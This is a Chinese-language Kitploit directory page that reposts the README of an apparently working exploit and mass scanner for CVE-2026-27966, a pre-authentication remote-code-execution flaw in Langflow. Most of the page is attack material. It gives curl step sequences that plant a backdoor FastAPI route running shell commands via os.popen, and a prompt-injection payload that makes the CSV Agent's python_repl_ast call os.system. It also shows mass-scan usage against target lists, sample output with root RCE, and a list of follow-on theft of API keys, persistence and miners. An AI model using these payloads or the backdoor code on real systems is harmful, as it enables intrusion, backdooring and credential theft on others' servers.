Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/shinthink/cve-2026-27966
侦察漏洞扫描器Payload生成漏洞利用Web应用程序漏洞利用渗透测试命令与控制AI 安全
GitHubshinthink/cve-2026-27966

CVE-2026-27966

Langflow < 1.8.0 的预认证 RCE 扫描器 — 路由注入 + 顶点注入 → 代码执行 (CVSS 9.8)

查看仓库
232个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-27966 — Langflow 远程代码执行扫描器

预认证路由注入 + 顶点注入 → Python 代码执行


概述

CVE-2026-27966 是影响 Langflow 1.8.0 之前版本的严重级别(CVSS 9.8)预认证远程代码执行漏洞。该漏洞源于 CSV Agent 组件中硬编码了 allow_dangerous_code=True,导致 LangChain 的 python_repl_ast 工具被暴露于未经认证的提示注入攻击。

此外,多个 API 端点缺少适当认证,使得攻击者即使在不使用 CSV Agent 的实例上也能进行直接路由注入和流顶点注入。

受影响版本

Langflow 版本状态
< 1.8.0易受攻击
>= 1.8.0已修补

攻击向量

该扫描器测试三种不同的利用途径:

1. 路由注入(auto_login 绕过)

root@kitploit:~
GET  /api/v1/auto_login          → 获取会话 / API 密钥
POST /api/v1/custom_component    → 注册后门路由
GET  /api/{backdoor}?c=command   → RCE

2. 直接路由注入(无需 API 密钥)

root@kitploit:~
POST /api/v1/custom_component    → 注册后门路由
GET  /api/{backdoor}?c=command   → RCE

3. 构建顶点注入(无认证构建)

root@kitploit:~
GET  /api/v1/flows/basic_examples  → 提取流 UUID(暴露 26 个)
POST /api/v1/build/{UUID}/vertices → 注入恶意顶点
POST /api/v1/run/{UUID}            → 执行顶点代码 → RCE

漏洞机制

根本原因

在 src/lfx/src/lfx/components/langchain_utilities/csv_agent.py 中,CSV Agent 节点硬编码了 allow_dangerous_code=True,这会自动暴露 LangChain 的 python_repl_ast 工具:

root@kitploit:~
agent_kwargs = {
    "verbose": self.verbose,
    "allow_dangerous_code": True,  # hardcoded — cannot be disabled via UI
}
agent_csv = create_csv_agent(..., **agent_kwargs)

这允许任何到达 CSV Agent 的提示通过以下方式执行任意 Python 代码:

root@kitploit:~
Action: python_repl_ast
Action Input: __import__("os").system("command")

未认证 API 暴露面

Langflow REST API 暴露了多个无需认证的端点:

通过 auto_login 绕过认证

在启用了 auto_login 的实例上(许多 Docker 部署中的默认配置),攻击者可以获得有效的会话和 API 密钥:

root@kitploit:~
curl -sk 'https://target.com/api/v1/auto_login'
# Returns session with access_token → full API access

有了有效的 API 密钥,攻击者便可以使用 POST /api/v1/custom_component 注册一个后门 FastAPI 路由,该路由会一直驻留在内存中,直到服务器重启:

root@kitploit:~
from fastapi import APIRouter, Query
router = APIRouter()
@router.get("/sh")
async def cmd(c: str = Query("")):
    import os
    return os.popen(c).read()
app.include_router(router, prefix="/api")

为什么是 CVSS 9.8


安装

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-27966.git
cd CVE-2026-27966
pip install -r requirements.txt

使用方法

root@kitploit:~
# Single target
python cve_2026_27966.py -t target.com:7860

# Mass scan
python cve_2026_27966.py -f targets.txt

# Mass scan + save results
python cve_2026_27966.py -f targets.txt -o rce.txt

# Detect only (skip exploitation)
python cve_2026_27966.py -f targets.txt --no-exploit

# Verbose output
python cve_2026_27966.py -f targets.txt -v

参数

root@kitploit:~
  -t, --target      单个目标(IP:port 或域名)
  -f, --file        目标列表,每行一个
  -o, --output      将 RCE 结果保存到文件
  --threads         并发工作线程数(默认:30)
  --no-exploit      仅检测,跳过 RCE 尝试
  -v, --verbose     显示所有结果,包括非 RCE 目标

概念验证(PoC)

检测与利用

root@kitploit:~
$ python cve_2026_27966.py -t target.com:7860 -v
root@kitploit:~
  CVE-2026-27966 — Langflow RCE Scanner
  CVSS 9.8 | Pre-Auth | Route Injection → RCE

  Host     : target.com:7860
  Langflow : YES v1.2.0
  Vuln     : YES
  API Key  : NOT REQUIRED
  RCE      : YES
  Output   : uid=0(root) gid=0(root) groups=0(root)
  Time     : 12.3s

批量扫描输出

root@kitploit:~
  CVE-2026-27966 Langflow RCE Scanner
  Targets: 4127 | Threads: 30 | Exploit: ON
  -------------------------------------------------------

  [RCE]  192.168.10.50     v1.2.0    7.3s
         uid=0(root) gid=0(root) groups=0(root)
  [AUTH] target.internal:4433 v1.2.0   14.1s  (API key)
  [500/4127] scanning... (12%)

  -------------------------------------------------------
  Total: 4127 | Langflow: 47 | RCE: 3 | API-Protected: 41
  -------------------------------------------------------

手动利用

步骤 1 — 检测 Langflow

root@kitploit:~
curl -sk 'https://target.com/api/v1/version'
# {"version":"1.2.0","main_version":"1.2.0","package":"Langflow"}

步骤 2 — 提取流 UUID

root@kitploit:~
curl -sk 'https://target.com/api/v1/flows/basic_examples/' | jq '.[0].id'
# "bb0a7390-22a1-4a2e-8d7c-15463e53d9f2"

步骤 3 — 注入后门顶点

root@kitploit:~
curl -sk -X POST 'https://target.com/api/v1/build/{UUID}/vertices' \
  -H 'Content-Type: application/json' \
  -d '{"id":"bkdr","type":"CustomComponent","data":{"code":"from fastapi import APIRouter\nrouter=APIRouter()\[email protected](\"/sh\")\nasync def cmd(c:str=\"\"):import os;return os.popen(c).read()\napp.include_router(router,prefix=\"/api\")","display_name":"X"}}'

步骤 4 — 执行命令

root@kitploit:~
curl -sk 'https://target.com/api/sh?c=id;hostname;uname -a'

影响

成功利用可在 Langflow Docker 容器中实现 以 root 身份远程执行代码。攻击者随后可以:

  • 从 Langflow 的 SQLite 数据库中提取 API 密钥(OpenAI、Anthropic、Gemini 等)
  • 访问已连接的向量数据库和外部服务
  • 通过自定义组件部署持久化后门
  • 向内部网络横向移动
  • 部署挖矿程序或 C2 基础设施

免责声明

仅供教育和授权测试使用。

本软件旨在供执行授权渗透测试的安全专业人员、审计自身基础设施的组织以及研究漏洞利用的研究人员使用。

未经授权访问计算机系统属违法行为,可能违反:

  • 美国:《计算机欺诈与滥用法》(18 U.S.C. 1030)
  • 印度尼西亚:UU ITE 第 30 条及第 46 条
  • 欧盟:第 2013/40/EU 号指令
  • 英国:《1990 年计算机滥用法》

作者对滥用行为不承担任何责任。使用本软件即表示您对自己的行为承担全部责任。


参考资料

资源链接

本项目与 Langflow 或 Logspace 无任何关联。

下载工具
端点认证暴露的数据
GET /api/v1/version无Langflow 版本
GET /api/v1/health无实例状态
GET /api/v1/flows/basic_examples/无26 个示例流的 UUID + 结构
POST /api/v1/build/{uuid}/vertices无接受任意代码注入
POST /api/v1/users/无用户创建(未激活)
GET /openapi.json无完整 API 文档
指标值
攻击向量网络(远程)
攻击复杂度低
所需权限无
用户交互无
影响范围不变
机密性高
完整性高
可用性高
GitHub 安全公告GHSA-3645-fxcv-hqr4
修复提交d8c6480d
Metasploit 模块Rapid7
NVD 条目CVE-2026-27966